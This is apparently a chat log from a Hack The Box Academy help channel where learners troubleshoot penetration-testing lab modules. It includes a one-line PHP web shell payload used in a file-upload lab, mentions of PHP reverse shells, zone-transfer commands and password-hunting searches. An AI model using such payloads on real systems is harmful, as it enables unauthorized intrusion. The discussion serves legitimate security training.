No idea. Someone who has the cert would know.
I meant in general as almost everything is AD
Seems the web is pretty popular.
hey
The exam is a mostly ad environment

I think he was asking in general terms.
I mean ya and no
There's no real AV/EDR on the exam, but you're not really taught much evasion techniques
I know the exam is mostly aD as the overview says it
But corp environs are mostly ad now
Why did you ask me then?
I don't know what is going on...
Because it’s an important topic that everyone should not rush thru and get bored of
¯_(ツ)_/¯
who gets bored of AD
The ad enum module is just a fair bit of tedium
Frankly, I feel like ADP testing would be really fun.
Devs devs get bored of AD
Not really boring, just if you have a wide net: it's gonna take ages
Lol. I don't think you should chastise me because I said "I will be happy when I am done"
I.e. running a broad query can take like 30 minutes
I didn't read it as you disliking it either, just glad to be done a large module
In truth. I am learning a lot.
That is part of why the chapter is so heavy and is taking me a while.
I have a question about the intercepting web requests module. When I use foxyproxy along with burp suite everything works fine and I can intercept requests. When I use zap with foxyproxy I get a login to network page. How do I fix this so I can use zap
oops I think this is the wrong section my bad
This is the right channel
Ok wasnt sure if I had to post to community help
this is the right place for help with academy modules; if someone that's completed it comes by they're more likely to help here than in the community help forum
that forum is more for general help than module help
is there a known connection problem on the getting started knowledge check lab?
Hello! I'm in SQL Injection Fundamentals > SQL Operators and the question is 'In the 'titles' table, ***what is the number of records*** WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?'
So *according* with the section, it needs something extra to learn beyond of the section because using what the section has shown it is not completely possible to know "the number of records", but you can see the records according with the section
I already have the answer to the question but I think could've been better that on the section would have shown that ***extra*** thing which is not shown.
SQL has a nice little feature of being able to count; but also it's asking specifically the employee number
aka their ID #
Anyone completed the HTML injection in PDF module? I'm not sure how to complete the objective "access an internal web application and exfiltrate the flag. " since I can't receive a callback at interactsh or the tun0 adapter of the pwnbox ;\
like if you're the 10000 employee your ID would be #<insert leading 0s>10000
Sure, but I mean at the level of output (number) which is different of the number of ID of the employee so... it's necessary that little feature that is not shown in the section 😅 but it would be very nice if one could learn that on the fly in the section and then think how we can do a better query
so on the getting started knowledge module I have a nc listener running and php reverse shell file saved into the theme edit page. When I go to click the link for the theme folder location which is http://gettingstarted.htb/theme/Innovation/template.php I get a server not found error
something like select name from titles where employee_number > 10000 OR job != "Engineer" if i'm remembering my negative sql queries right
then all you have to do is maybe use the built-in count feature to actually count
i forgor how to set up a count query
oh wait it might just be count(name)
for specifically that variable
Exactly! well, is with COUNT(something) AS and so on
technically you can just leave out the as
you'd only really include AS to have another variable
But that query is the first thing that comes to mind of one
And yeah, that's exactly what would be nice to learn in the section besides of && || and the other things, like a kind of great explanation to use COUNT like they did with the others features like WHERE, AND, etc 
this is the SQL injection fundamentals module?
Yes!
ok; because there's like 2-3 different SQL inject modules
so yeah I agree it should be included/talked about
but it doesn't hurt to have to do a bit of self-research
Can anyone help me out with the Secure Coding 101: Skills Assessment for the Patch section? Im just at a loss at what I am supposed to sanitize. I have tried to sanitize a bunch of different stuff but nothing's worked yet
I'm running the knowledge check through openvpn should I just try start an instance since I can't connect to the server this way? I've tried re running this several times now
the vpn should be fine; as long as you get the initialization complete message in your terminal in the vm it should be fine
Ran a lot faster on the instance surprisingly vs OpenVPN. Figured out the issue though which was just inputting the target ip vs the given url address
who can help me "INTRO TO WHITEBOX PENTESTING-Skills Assessment",I tried the payload in this module, but it still didn't work. For confidentiality reasons, I can't show my specific payload here. If anyone is willing to help, I can send the specific content via private message.
Wasn’t able to do python http server
Is anyone else having problems spawning targets in HTB? trying to continue but Is not working
Pwnbox hasn’t got connection with my pc tried pinging it
it does not even generate the ip, maybe is to busy, will try later
well no: what they were saying, and what you misunderstood, is that any resources that you downloaded onto your computer can also be downloaded onto the pwnbox
you can also ssh to the pwnbox from your own computer
but you can't do the reverse as it would require setting up port forwarding and other things
try changing vpn regions
Do I use the eth0 ip or tun0 ip for ssh?
the pwnbox you connect to it via the eth0/public IP
running the vpn at the same time as the pwnbox will cause issues
is working now, ty!
Password is the regular one isn’t it? With username htb-student?
no
the username and password are different for the pwnbox machine; as it's still a secure environment
the password is randomly generated every time you launch the pwnbox and stored on the desktop
again that's going far out of the way to do basic things
Someone have problem with target hosts in network 10.129.x.x? 168 packet send, 95% loss. I use vpn, network 10.10.14.x. Module Windows priv escalation
This is the last time I will be using Pwnbox.
change vpn region
Indeed.
us-academy-2 same problem. Before used eu-academy-2
Target isn’t Spawning for me too using SG
that's the pwnbox region: not vpn region
they are separate things
pwnbox region dictates where pwnbox spawns
vpn region dictates where target spawns
Could use a hand with File Upload Attack - Blacklist Filters (https://academy.hackthebox.com/module/136/section/1288) if anyone is able to help. None of the file extensions seem to execute my payload and I've definitely hit a wall. Happy to discuss what I've tried in more detail but don't wanna spoiler too much here 😅
Update: Was able to get this working, but never with ?cmd=id (or whatever command) and don't know why 😦
Pwnbox and target are different right?
yes
pwnbox exclusively refers to the in-browser vm that spawns when you click "Start Instance"
target refers to the machine you are attacking; "Click here to spawn target"
So if I choose any region let’s say SG for instance both Pwnbox and Target will spawn jn that region ?
can i get a hint on web services & api attacks? twist of sqli. i can't find the parameter that's vulnerable, i tried the example wordlist and i tried a much bigger wordlist. what wordlist should i use here?
Updated my comment above 👆: #modules message
no
its ?cmd=id
pwnbox only spawns in the pwnbox region
target only spawns in the target region
they are separate for those purposes
Yeah, I mean, I fixed my comment - but in general adding the param causes it to 404 regardless.
what's the file that you uploaded and the full url that you gave?
Payload: <?php system($_REQUEST['cmd']); ?>
URL: http://SERVER:PORT/profile_images/test.<EXTENSION>?cmd=id
I used intruder to upload it with every possible extension, and then checked each extension with a command both with intruder and manually and have only hit 404s.
Was able to figure out what extension was working by uploading some php that just echoed some text, and then upload an interactive shell that worked fine. URL based was the only issue 🤷
I mean if it's 404 that means the url is wrong or something, causing it to request a file that's not there
Well, now I'm even more confused, haha. Gonna come back at it tomorrow and try to figure out what went wrong 🤷 Thanks for the input.
who can help,just a little hint
hi there. i downloaded mp3 that make application crash (probably because of meta data). Is anyone has time to check that or talk about it?
thank you for your help. I cant believe how the world would be without you Marcie and those precious advice
hey guys i am on web info gathering module i want to find cms on app.inlanefreight.local host i already run whatweb command but no luck.
can anyone help me?
use the tools showcased in the section
hey what is cms on vhost
Anyone else have issues with ffuf on subdomain enumeration? It's killing my connection after ~800 attempts.
It's OK to understand the mindset needed
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com
Kills my VM connection whether I'm on VPN or not, since VPN isn't needed for this exercise I tried with and without
Gobuster also had the same issue, however it got further through the list
Googled all over found some other posts/forums that had the same issue but no clear resolution
That might just be a networking issue on your end
Sounds like your bandwidth is getting thwacked
Sounds like something is not right, you do need to be connected to the VPN in order to enumerate with ffuf. unless you're talking about an attack box?
How would I verify that? I have very good internet quality.
Not for inlanefreight.com
It's a Public website being attacked
ahhh
Not a private domain
nm sorry
no worries
Inlanefreight.com is a real {fictional} website for a fake Company that htb uses and references
yeah i've been working with inlanefreight.local for days so i didn't really process it lol
I tried with http: instead of https: as well, same thing
What's weird is it only kills my VM connection, not my Windows connection
it very well could be your connection if it's poor, there may be an option to manually set the amount of threads ffuf uses, try lowering it
hi
Ye it's nuking your vm's network bandwidth
the flag -t <number> dictates how many threads run, default is 40. try lowering it to like 20 or 10.
I tried 10 earlier, same issue
try 5 or like 1
How do I diagnose this and/or get a log output?
you can try -t 5 -p 0.1 to really slow it down
if you have a subscription and the attackbox reaches the internet you may be able to do it from the attack box which has a more stable connection
Haha, -t 1 froze it after 11 requests!
I can't win!
Oh, wait, it's going again now. I'll see if it stops at its normal 800 ish
Yeah, froze at 801.
Maybe something in your list is broken
hey everyone on the Common service attacks dns attack and ettercap wont work with tun0
anyone else have this issue
I didn't have to use ettercap
oh ok
i have the sub **.inl....htb but when i dig i get nothing?
my command is dig AXFG **.inlanefreight.htb inlanefreight.htb and i have tried with ip as well
i have looked on previous posts
just no luck this is going full week now lol any help anyone
i get a cookie but that isnt the answer?
Working on the Intro to noSQL Injection, since I'm automating everything I found bmdyy's flag before the section arrived loool
Only now I understood where this flag belongs😹
htb is not an official TLD. It can therefore not be resolved by the root server.
2 things: axfr; second dig uses @nameserver
so happy i got thank you MarcieLee I just realised this whole time was 1 letter was wrong
thank you again
it's always the one letter
Hi
guyss when we take the exam, do we use our own vm or must use htb web based pwnbox? idk if it written anywhere tho :/
IDK
use whatever you want
At the module it uses brute-force on 1 account to exfiltrate data, if someone is interested my script is able to exfiltrate all data (which might be tricky since if the trackingNum for different accounts start with the same letters need to deal with that), will be able to upload later if might help
https://academy.hackthebox.com/module/145/section/1307
i dont understand this template injection lab 1 example i got a reverse shell but there are no files on it and when doing env or trying to find env variables i get nothing
this module I finished can I dm you
This module requires crackmapexec for me to get smb passwords but I can't get crackmapexec to work to save my life. It has a python3-neo4j dependency, but I can't find an installation for that. I installed neo4j via pip but it doesn't want to use that one
Nvm. I just used hydra instead.
I also found I can install crackmapexec via poetry and was able to run it that way, but that's the only way I've found so far.
Poetry is for if you wanna dev it
Regardless, it did work at least. I don't really even know what poetry is
Its a dev-like tool
Is netexec a replacement for crack?
Yes
Awesome, I'll try that one
Is there an alternate tool to Evil-winrm that you're aware of?
The gem install just hangs
Hello, im doing the cracking passwords with hashcat module on the exercise to crack the provided zip. On my VM i get erros 'CL_BUILD_PROGRAM_FAILURE' and 'Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.' Anyone know how to solve this?
sounds like you have the wrong hashcat version installed
What am I doing wrong here?
is it the right one for your system?
:) it sounds like it doesn't have the right build stuff
I see, how can i find out which is the right one for my system?
google win-rm ssl error; or search this chat i'm sure someone's shared a solution
well generally the one from the apt repository is right
this issue can occur while, for instance, trying to run the arm compatible one on an amd cpu
I am using a amd cpu and gpu, where can i find one that will work with these?
well it's usually installed with whatever pentest distro you installed
but should also be in apt
The only solution I found was to add a line to the openvpn file but that line is already there.
I use ParrotOS but not the htb one, ill have a look in apt
the openvpn issue won't resolve the win-rm issue my dude
how did you install it?
Downloaded off the parrotOS website, then run it in oracle vm
ohh 🤣 just sudo apt install hashcat
ok so it sounds like something broke in the install
sudo apt purge hashcat
restart vm
sudo apt install hashcat
no luck, still get the same errors
Well if anyone needs to know and find a more recent search in the chat, you have to edit the /etc/ssl/openssl.cnf file to look like this
sure feel free
Someone with experience in CTF ? PV
How to install vpn tutorial ?
What do you mean by VPN tutorial? What do you want to install?
On module Password attacks:
What is the default password of every newly created Inlanefreight Domain user account? (Format: Case-Sensitive)
i already tried to use findstr findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml *.exe
still no luck i already found the answer to the last question this is the last one keeping me on finishing the section
Yes
